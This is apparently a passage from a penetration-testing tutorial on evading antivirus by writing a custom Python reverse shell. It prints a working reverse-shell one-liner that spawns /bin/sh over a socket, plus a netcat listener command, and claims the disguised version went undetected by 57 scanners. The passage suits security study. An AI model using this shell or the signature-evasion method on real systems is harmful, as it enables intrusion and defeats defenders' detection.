As we know, one of the finest techniques to evade antivirus software is to write custom exploits. If the exploit is written from scratch, there is very little chance for the antivirus engine to match the code signature against the known malicious signatures. In this section, we will write a custom shell that returns a reverse shell from the victim's machine and see how many AV engines can detect it.

Let's write a custom exploit, name it my_car.py, and place the following code in it:

If we observe the preceding code, we can see that it is an adaption of a Python code to spawn a reverse shell to an attacker's IP address. We are importing the Python modules and assigning an alias to the imported modules locally. The AV engines mostly work on the signature approach, and the known signatures, such as subprocess.call["/bin/sh","-i"'], are likely to be detected. In this case, we are playing around with local variables to ensure to ensure the attacker IP, the port number, the OS modules, and other Python modules are not detected. The original code that the preceding code is adapted from is shown here:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Let's now run the code to see if we get the shell. We will use a Netcat listener to receive the shell:

nc -nlvp 8000
python3 my_car.py

The preceding command when implemented produces the output shown in the following screenshot:

We can see that the preceding code works pretty well. It's important for us to see if this would be picked up by any AV engine. Let's check it using the VirusTotal tool, as shown here:

Let's now see whether we were detected by any of the scanning engines:

As we can see, none of the 57 scanning engines tested detected the file.